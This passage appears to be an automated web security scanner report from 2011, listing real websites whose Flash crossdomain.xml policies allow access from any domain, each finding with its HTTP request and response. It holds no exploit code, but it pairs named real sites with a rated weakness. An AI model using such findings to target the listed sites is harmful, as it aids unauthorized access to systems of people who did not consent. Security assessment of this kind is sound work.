Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.semilo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:55:36 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 17:41:25 GMT
ETag: "24b0002-69-48394f45d5b40"
Accept-Ranges: bytes
Content-Length: 105
X-Server: wsl03
X-Site: www.semilo.info
X-Aliases: semilo.info *.semilo.info *.semilo.nl semilo.nl *.semilo.com semilo.com *.semilo.net semilo.net *.semilo.be semilo.be *.semilo.de semilo.de *.semilo.co.uk semilo.co.uk *.semilo.org semilo.org *.semilo.biz semilo.biz *.semilo.tv semilo.tv *.semilo.nu semilo.nu *.semilo.eu semilo.eu *.semilog.nl semilog.nl *.semmilo.nl semmilo.nl *.semilo.mobi semilo.mobi *.pre-game-commercials.nl pre-game-commercials.nl *.akjz.nl akjz.nl *.semilo.it semilo.it *.click-box.nl click-box.nl *.liveactionads.nl liveactionads.nl *.a-platform.nl a-platform.nl *.aplatform.nl aplatform.nl *.semilo.es semilo.es *.engagementtargeting.nl engagementtargeting.nl
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.108. http://www.silkpurealmond.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.silkpurealmond.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.silkpurealmond.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:28:33 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 12:19:32 GMT
ETag: "278042-d7-49a969cb93d00"
Accept-Ranges: bytes
Content-Length: 215
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.109. http://www.skittles.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skittles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.skittles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 18:03:20 GMT
ETag: "1c385-63-658cea00"
Accept-Ranges: bytes
Content-Length: 99
Content-Type: text/xml
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.110. http://www.slizone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slizone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.slizone.com

Response

HTTP/1.0 200 OK
Content-Length: 211
Content-Type: text/xml
Last-Modified: Wed, 19 Mar 2008 19:52:29 GMT
Accept-Ranges: bytes
ETag: "7ef6bec3fa89c81:241"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Wed, 04 May 2011 01:16:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-dom
...[SNIP]...

6.111. http://www.smalldressup.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smalldressup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smalldressup.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 02 May 2010 13:14:05 GMT
Accept-Ranges: bytes
Content-Length: 264
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.112. http://www.smucker.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smucker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smucker.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 209
Content-Type: text/xml
Last-Modified: Wed, 13 May 2009 18:45:25 GMT
Accept-Ranges: bytes
ETag: "c0db83fafad3c91:3d4f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:46:21 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domai
...[SNIP]...

6.113. http://www.sooeveningnews.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sooeveningnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sooeveningnews.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:12:04 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 484
X-Cache: HIT from parent1.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent1.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.114. http://www.startlap.hu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.startlap.hu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.startlap.hu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:57 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 03:40:28 GMT
Accept-Ranges: bytes
Content-Length: 140
Vary: Accept-Encoding
W: w34
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<!--<allow-access-from domain="*.adverticum.net" />-->
<allow-access-from domain="*" />
</cross-domain-policy>

6.115. http://www.stream.cz/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.stream.cz
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stream.cz

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:18:17 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 07:56:03 GMT
ETag: "10108a9-cd-4a20a015baac0"
Accept-Ranges: bytes
Content-Length: 205
Cache-Control: max-age=0, no-cache, must-revalidate, no-transform
Pragma: no-cache
X-XRDS-Location: http://id.seznam.cz/yadis
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.116. http://www.terrypaton.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.terrypaton.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terrypaton.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 11 Aug 2009 01:53:14 GMT
ETag: "12390c-184-f72a5680"
Accept-Ranges: bytes
Content-Length: 388
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" />
...[SNIP]...

6.117. http://www.thecoastalsource.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thecoastalsource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thecoastalsource.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:09 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n12 ( iad-agg-n3), ms iad-agg-n3 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Wed, 04 May 2011 01:07:09 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.118. http://www.trade2finance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trade2finance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.trade2finance.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:03 GMT
Server: Apache
Last-Modified: Sun, 04 Apr 2010 16:01:50 GMT
ETag: "d2d748-68-4bb8b7ee"
Accept-Ranges: bytes
Content-Length: 104
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.119. http://www.tv5.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tv5.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tv5.org

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 05 Jul 2010 09:37:31 GMT
ETag: "117ac3-d6-af856cc0"
Accept-Ranges: bytes
Content-Length: 214
Content-Type: text/xml
Date: Wed, 04 May 2011 00:46:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-
...[SNIP]...

6.120. http://www.ucanbuyme.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ucanbuyme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ucanbuyme.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:18 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

6.121. http://www.uhc-networkbulletin.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uhc-networkbulletin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.uhc-networkbulletin.com

Response

HTTP/1.1 200 OK
Content-Length: 84
Content-Type: text/xml
Last-Modified: Tue, 12 Apr 2011 15:33:28 GMT
Accept-Ranges: bytes
ETag: "a05ecdf826f9cb1:a56c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:01:46 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.122. http://www.ussoccer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ussoccer.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ussoccer.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 03 Aug 2009 23:52:48 GMT
Accept-Ranges: bytes
ETag: "20b587819514ca1:0"
Server: Microsoft-IIS/7.0
X-Server: PRODWEB02
X-Powered-By: ASP.NET
Content-Length: 243
Date: Wed, 04 May 2011 03:49:46 GMT
Connection: close

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<!-- Top level domain -->
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain
...[SNIP]...

6.123. http://www.vdopia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vdopia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.vdopia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 13 Mar 2008 08:17:51 GMT
ETag: "20691-ca-4484d308be9c0"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.124. http://www.versuscountrybagamonsterbuck.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.versuscountrybagamonsterbuck.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.versuscountrybagamonsterbuck.com

Response

HTTP/1.1 200 OK
Content-Length: 213
Content-Type: text/xml
Last-Modified: Tue, 01 Sep 2009 19:44:05 GMT
Accept-Ranges: bytes
ETag: "44f999903c2bca1:273"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:47:28 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-dom
...[SNIP]...

6.125. http://www.visitpensacola.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitpensacola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.visitpensacola.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 06 May 2010 20:28:00 GMT
ETag: "55299b5-e1-485f2c75a3400"
Accept-Ranges: bytes
Content-Length: 225
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 01:49:18 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.126. http://www.wandtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wandtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wandtv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 02:55:43 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 02:55:43 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.127. http://www.washfm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washfm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.washfm.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3190353162
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:35:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:35:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.128. http://www.watfordoutlet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watfordoutlet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.watfordoutlet.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:38:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 12 Sep 2009 14:58:49 GMT
Accept-Ranges: bytes
Content-Length: 347
Content-Type: application/xml
Age: 0
Server: YTS/1.19.8

<?xml version="1.0" encoding="iso-8859-1"?>

<cross-domain-policy>
<allow-access-from domain="*.watfordoutlet.com" />
<allow-access-from domain="*.heavygames.com" />
<allow-access-from domain="*.kickingames.com" />
<allow-access-from domain="*.totallyflashgames.com" />
<allow-access-from domain="*" />
...[SNIP]...

6.129. http://www.weallwantsomeone.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weallwantsomeone.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weallwantsomeone.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:59:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.130. http://www.weddingdecor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weddingdecor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weddingdecor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:58 GMT
Server: Microsoft-IIS/6.0
Content-Length: 170
Content-Type: text/xml
Content-Location: http://www.weddingdecor.com/crossdomain.xml
Last-Modified: Tue, 12 Aug 2008 05:10:25 GMT
Accept-Ranges: bytes
ETag: "e3bcedba39fcc81:1e69"
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*"/>

</cross-domain-policy>

6.131. http://www.werelate.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.werelate.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.werelate.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:24 GMT
Server: Apache/2.2.4 (Fedora)
Last-Modified: Sat, 12 Jul 2008 16:28:25 GMT
ETag: "48243-c8-25bf7c40"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.132. http://www.wlns.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wlns.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wlns.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 01:48:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:48:32 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.133. http://www.wmji.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wmji.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wmji.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189142375
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:56:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:56:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.134. http://www.xpmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xpmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xpmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) PHP/5.2.9 mod_ssl/2.2.17 OpenSSL/0.9.7l mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub
Last-Modified: Thu, 29 Jul 2010 04:21:46 GMT
ETag: "34275ca-c2-48c7f1280aa80"
Accept-Ranges: bytes
Content-Length: 194
MS-Author-Via: DAV
Content-Type: application/xml
Date: Wed, 04 May 2011 02:17:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.135. http://www.yorkpress.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yorkpress.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yorkpress.co.uk

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Cache-Control: private, max-age=0, must-revalidate
ETag: "921a833a1c6fdcf67bcef5abdf389b0e"
Last-Modified: Wed, 04 May 2011 02:47:07 +0100
Set-Cookie: nqdm=80b52e5d53084dbd727b8074d27b54c2; expires=Tue, 19 Jan 2038 03:14:07 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 264
Date: Wed, 04 May 2011 01:47:07 GMT
X-Varnish: 1358719360
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...

